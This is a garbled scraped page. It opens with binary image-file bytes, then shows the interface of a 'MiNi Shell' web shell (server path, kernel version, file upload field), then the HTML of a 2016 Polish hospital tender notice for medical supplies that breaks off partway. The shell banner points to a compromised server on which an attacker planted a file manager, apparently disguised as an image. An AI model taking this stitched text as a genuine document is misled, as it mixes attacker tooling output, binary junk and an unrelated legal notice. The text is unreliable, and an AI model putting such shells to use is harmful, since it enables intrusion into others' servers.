JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160517/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160517/124594-N-2016.html

<p class="kh_header"><b>Sanok: dostawę sprzętu jednorazowego i wielokrotnego  użytku dla SPZOZ w Sanoku - uzupełnienie</b><br>
<b>Numer ogłoszenia: 124594 - 2016; data zamieszczenia: 17.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej , ul. 800-lecia 26, 38-500 Sanok, woj. podkarpackie, tel. 013 4656290, faks 013 4656290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zozsanok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawę sprzętu jednorazowego i wielokrotnego  użytku dla SPZOZ w Sanoku - uzupełnienie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zakup o charakterze sukcesywnym materiałów sprzętu medycznego jednorazowego i wielokrotnego użytku  i innych wraz z jego dostarczeniem na koszt i ryzyko Wykonawcy do Magazynu SPZOZ w Sanoku, ul. 800-lecia 26, z podziałem zamawianego asortymentu na poszczególne zadania,
Wspólny słownik zamówień:
CPV - 33.19.00.00-8 - różne urządzenia i produkty medyczne 
Zaoferowane wyroby muszą być dopuszczone do obrotu i stosowania zgodnie z obowiązującymi przepisami. 
2.Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia.
3.Zamawiający dopuszcza możliwość składania ofert równoważnych spełniających co najmniej opisane w siwz wymagania i parametry techniczne, przy czym Wykonawca zobowiązany jest do wykazania równoważności w swojej ofercie. 

4.Wykonawca musi zaoferować 60 dniowy termin płatności faktury VAT od daty prawidłowego jej wystawienia oraz okres niezmienności cen przez okres obowiązywania umowy.
Warunki realizacji zamówienia zostały zawarte we wzorze umowy stanowiącym integralną część SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 23.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże że   w ciągu ostatnich 3 lat przed upływem terminu składania ofert lub w okresie działalności - jeżeli jest krótszy niż 3 lata zrealizował należycie, co najmniej jedno zamówienie polegające na dostawie dostawie   sprzętu medycznego jednorazowego i/lub wielokrotnego użytku, o wartości co najmniej:
w  zadaniu nr 1-        4 900,00  zł brutto
w  zadaniu nr 2-           900,00  zł brutto
w  zadaniu nr 3-      60 000,00  zł brutto
w  zadaniu nr 4-      50 000,00  zł brutto
w  zadaniu nr 5-        4 800,00  zł brutto
w  zadaniu nr 6-        3 000,00  zł brutto
w  zadaniu nr 7-      11 000,00  zł brutto
w  zadaniu nr 8-      13 000,00  zł brutto
w  zadaniu nr 9-        6 000,00  zł brutto
w  zadaniu nr 10-    22 000,00  zł brutto
w  zadaniu nr 11-    70 000,00  zł brutto
w  zadaniu nr 12-     95 000,00  zł brutto
w  zadaniu nr 13-     15 000,00  zł brutto
w  zadaniu nr 14-     35 000,00  zł brutto
w  zadaniu nr 15-       6 800,00  zł brutto
w  zadaniu nr 16-     24 000,00  zł brutto
w  zadaniu nr 17-       3 000,00  zł brutto
w  zadaniu nr 18-     39 000,00  zł brutto
w  zadaniu nr 19-     64 000,00  zł brutto
w  zadaniu nr 20-     14 000,00  zł brutto
w  zadaniu nr 21-     14 000,00  zł brutto
w  zadaniu nr 22-     34 000,00  zł brutto
w  zadaniu nr 23-     15 000,00  zł brutto

i potwierdzi ten fakt dowodem tj. poświadczeniem , ( dokument powinien  określać  datę jego wystawienia, podmiot wystawiający dokument i przedmiot, ) lub  oświadczeniem wykonawcy jeżeli  z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia 

W przypadku składania oferty na więcej niż 1 zadanie, wartość wykazanych w ofercie wykonanych dostaw w okresie ostatnich 3 lat przed upływem terminu składania ofert lub w okresie działalności - (jeżeli jest krótszy niż 3 lata), nie może być mniejsza niż  suma wymaganych wartości dostaw dla ofert częściowych (zadań).
Warunek  zostanie oceniony w systemie  zero - jedynkowym, tzn. spełnia - nie spełnia na podstawie przedłożonych oświadczeń i dokumentów. 
Nie wykazanie przez Wykonawcę spełniania ww. warunku będzie skutkować odpowiednio wykluczeniem Wykonawcy z postępowania i w konsekwencji  odrzuceniem jego oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>co najmniej jedno zamówienie polegające na dostawie dostawie   sprzętu medycznego jednorazowego i/lub wielokrotnego użytku, o wartości co najmniej:
w  zadaniu nr 1-        4 900,00  zł brutto
w  zadaniu nr 2-           900,00  zł brutto
w  zadaniu nr 3-      60 000,00  zł brutto
w  zadaniu nr 4-      50 000,00  zł brutto
w  zadaniu nr 5-        4 800,00  zł brutto
w  zadaniu nr 6-        3 000,00  zł brutto
w  zadaniu nr 7-      11 000,00  zł brutto
w  zadaniu nr 8-      13 000,00  zł brutto
w  zadaniu nr 9-        6 000,00  zł brutto
w  zadaniu nr 10-    22 000,00  zł brutto
w  zadaniu nr 11-    70 000,00  zł brutto
w  zadaniu nr 12-     95 000,00  zł brutto
w  zadaniu nr 13-     15 000,00  zł brutto
w  zadaniu nr 14-     35 000,00  zł brutto
w  zadaniu nr 15-       6 800,00  zł brutto
w  zadaniu nr 16-     24 000,00  zł brutto
w  zadaniu nr 17-       3 000,00  zł brutto
w  zadaniu nr 18-     39 000,00  zł brutto
w  zadaniu nr 19-     64 000,00  zł brutto
w  zadaniu nr 20-     14 000,00  zł brutto
w  zadaniu nr 21-     14 000,00  zł brutto
w  zadaniu nr 22-     34 000,00  zł brutto
w  zadaniu nr 23-     15 000,00  zł brutto

i potwierdzi ten fakt dowodem tj. poświadczeniem;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy.
W szczególności dopuszczalne są zmiany:
a) korzystne dla zamawiającego w tym, przewidujące niższą cenę udzielonego zamówienia niż wynikająca z treści oferty bądź szerszy zakres zobowiązania wykonawcy lub kształtujące w sposób korzystniejszy niż wynikało by to z treści oferty sposób zapłaty za udzielone zamówienie, w szczególności w ratach zamiast jednorazowej płatności lub w większej ich liczbie, bądź przewidujące dłuższy termin zapłaty.
b) przewidujące dłuższy termin wykonania zamówienia na skutek obiektywnych okoliczności których nie można było przewidzieć, w przypadku niezrealizowania całości zamówienia i przy zastosowaniu tych samych cen jednostkowych
c) przewidujące dostawy równoważne w nowszej i oczywiście lepszej technologicznie ich wersji, bądź te same dostawy w innym opakowaniu jeżeli w obydwu przypadkach nie prowadzi to do zwiększenia ceny,
2. Zmiany nie mogą dotyczyć zobowiązań wykonawcy zawartych w ofercie, które  były oceniane w toku postępowania o udzielenie zamówienia publicznego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsanok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Budynek Administracji  SPZOZ w Sanoku ul. 800-lecia 26- , POK. NR 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2016 godzina 10:00, miejsce: Budynek Administracji SPZOZ w Sanoku ul. 800-lecia 26 - SEKRETRIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> osprzęt do rurek intubacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> osprzęt do rurek intubacyjnych w 4 pozycjach asortymentowych
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ustniki do spirometru.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ustniki do spirometru w 2 pozycjach asortymentowych
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wstrzykiwacze kontrastu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wstrzykiwacze kontrastu w 1 pozycji asortymentowej
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. ocena użytkowa - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> osprzęt do podciśnieniowej terapii leczenia ran.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> osprzęt do podciśnieniowej terapii leczenia ran w 4 pozycjach asortymentowych
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> proktoskop operacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> proktoskop operacyjny w 1 pozycji asortymentowej
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> kaniule do nosa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kaniule do nosa w 1 pozycji asortymentowej
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> opaski do drukarki Zebra.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> opaski do drukarki Zebra w 2 pozycjach asortymentowych
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> pojemniki do dozowników tlenowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pojemniki do dozowników tlenowych w 2 pozycjach asortymentowych
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. ocena użytkowa - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> zestawy do wkłucia centralnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zestawy do wkłucia centralnego w 1 pozycji asortymentowej
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. ocena użytkowa - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> wskaźniki, testy, taśmy do sterylizacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wskaźniki, testy, taśmy do sterylizacji w 7 pozycjach asortymentowych
Szczegółowy opis,  zakres i wielkość przedmiotu zamówienia został zawarty w formularzu przedmiotu zamówienia, cenowym stanowiącym załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. termin wykonania-dostawy - 3</li>
</ul>
</li>
